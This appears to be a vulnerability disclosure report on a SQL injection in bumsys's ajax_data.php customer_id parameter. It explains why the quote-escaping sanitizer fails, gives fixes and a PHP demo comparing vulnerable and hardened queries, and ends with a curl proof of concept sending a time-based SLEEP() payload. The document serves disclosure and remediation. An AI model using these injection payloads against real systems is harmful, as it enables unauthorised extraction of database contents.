SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys
Reported on
Feb 28th 2023
Description
There is an SQL injection in the customer_id parameter handled by core/ajax/ajax_data.php.
Let's take a look at the following code:
https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537
where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0
The core problem is that, although safe_input() is applied to customer_id, as seen here https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447
$customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";
the query then interpolates the value into a numeric comparison without quotes and without casting it to an integer. An escaping-based sanitizer only protects string contexts: a payload such as 0 OR (SELECT SLEEP(1)) contains no quote characters, so it passes through safe_input() unchanged and is executed as SQL. No quote ever needs to be injected.
Fix
change
where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0
to
where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0
Quoting the values turns the comparison into a string context, so the quote escaping performed by safe_input() (assuming it does escape quote characters) becomes effective. A fix that does not depend on the sanitizer at all is to enforce the type, e.g. (int) $_GET["customer_id"], or to bind the values through a prepared statement.
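The following is an added example, not code from bumsys, that reproduces the pattern above against an in-memory SQLite database via PDO and puts the vulnerable interpolation next to the two hardened variants. Assumptions: safe_input() is replaced by a stand-in that strips tags and escapes quotes (the real function is not shown here); the product_stock table and its rows are constructed for the demo; and because SQLite has no SLEEP(), the payload is the boolean 0 OR 1=1 instead of the time-based one from the proof of concept.

```php
<?php
// Added example, not bumsys code. Mirrors the query shape from
// core/ajax/ajax_data.php against an in-memory SQLite database.

// Stand-in for the project's safe_input() (assumption: escapes quotes
// and strips HTML, but does not enforce a type). A quote-free numeric
// payload has nothing for it to escape.
function safe_input(string $value): string {
    return addslashes(strip_tags(trim($value)));
}

// Constructed schema and rows for the demo.
function setup(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE product_stock (stock_product_id INTEGER, '
            . 'sales_customer_id INTEGER, is_trash INTEGER, qty INTEGER)');
    $db->exec('INSERT INTO product_stock VALUES (2, 7, 0, 5), (2, 8, 0, 3), '
            . '(2, 9, 0, 1), (3, 7, 0, 4)');
    return $db;
}

// Vulnerable: same interpolation as the report, unquoted numeric context.
// "0 OR 1=1" parses as (stock_product_id = 2 AND sales_customer_id = 0)
// OR (1=1 AND is_trash = 0), i.e. every non-trashed row of every customer.
function vulnerable(PDO $db, string $product_id, string $customer_id): array {
    $product_id  = safe_input($product_id);
    $customer_id = safe_input($customer_id);
    $sql = "select * from product_stock where stock_product_id = {$product_id} "
         . "and sales_customer_id = {$customer_id} and product_stock.is_trash = 0";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 1: enforce the integer type before interpolating. (int)'0 OR 1=1' is 0.
function fixedCast(PDO $db, string $product_id, string $customer_id): array {
    $product_id  = (int) $product_id;
    $customer_id = (int) $customer_id;
    $sql = "select * from product_stock where stock_product_id = {$product_id} "
         . "and sales_customer_id = {$customer_id} and product_stock.is_trash = 0";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 2: prepared statement; the input is bound as data, never parsed as SQL.
function fixedPrepared(PDO $db, string $product_id, string $customer_id): array {
    $stmt = $db->prepare('select * from product_stock where stock_product_id = :pid '
                       . 'and sales_customer_id = :cid and product_stock.is_trash = 0');
    $stmt->bindValue(':pid', (int) $product_id, PDO::PARAM_INT);
    $stmt->bindValue(':cid', (int) $customer_id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db      = setup();
$payload = '0 OR 1=1'; // quote-free, so the escaping sanitizer passes it through

printf("vulnerable (payload): %d rows\n", count(vulnerable($db, '2', $payload)));
printf("cast fix   (payload): %d rows\n", count(fixedCast($db, '2', $payload)));
printf("prepared   (payload): %d rows\n", count(fixedPrepared($db, '2', $payload)));
printf("prepared   (legit 7): %d rows\n", count(fixedPrepared($db, '2', '7')));
```

Run with php (pdo_sqlite enabled). The vulnerable query returns rows belonging to every customer and every product, while both fixed versions return nothing for the payload and still return the customer's own row for a legitimate customer_id. The cast is the smallest change to the existing code; the prepared statement is the one to reach for when the same pattern is repeated elsewhere, because it does not rely on remembering the cast at each call site.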
Proof of Concept
Make a GET request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))
with a valid session cookie and a valid CSRF token, and observe the delay introduced by SLEEP() compared with a request using a plain numeric customer_id.
curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' \
     -H 'Connection: keep-alive' \
     -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' \
     -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' \
     --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"
Impact
Authenticated users can extract the contents of the database; the proof of concept demonstrates a time-based blind channel, which suffices to read arbitrary values one condition at a time.
Good finding. Will fix soon. Thank you.